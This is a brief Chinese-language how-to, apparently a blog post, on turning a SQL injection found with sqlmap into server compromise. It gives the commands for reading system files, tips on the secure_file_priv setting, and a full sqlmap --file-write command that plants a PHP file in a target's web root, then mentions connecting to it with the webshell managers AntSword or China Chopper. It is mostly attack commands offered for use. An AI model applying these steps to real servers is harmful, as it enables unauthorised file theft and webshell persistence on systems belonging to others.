找到了一个注入点,然后用sqlmap也很容易就跑出了库表数据,
但是在读取目标服务器系统文件和上传文件的过程中遇到一些小问题
1.使用–file-read 命令的时候不能读取到系统文件
原因:mysql里面有个权限不对,查看该权限命令
show global variables like 'secure_file_priv';
| secure_file_priv | NULL |
mysql5.7之后这里默认是NULL,需要改成空
| secure_file_priv | |
在/etc/my.cnf 添加secure_file_priv = 然后重启数据库
这样就可以读写系统文件了
2.另外在写入文件到目标服务器的时候
sqlmap -u 'http://ss.ss.com/index.php?s=news&cid=17' --file-write 1.php --file-dest /var/www/test/1.php
/var/www/test/1.php
后面记得跟文件名,要不然写不进去
最后就是蚁剑或者菜刀连接了~~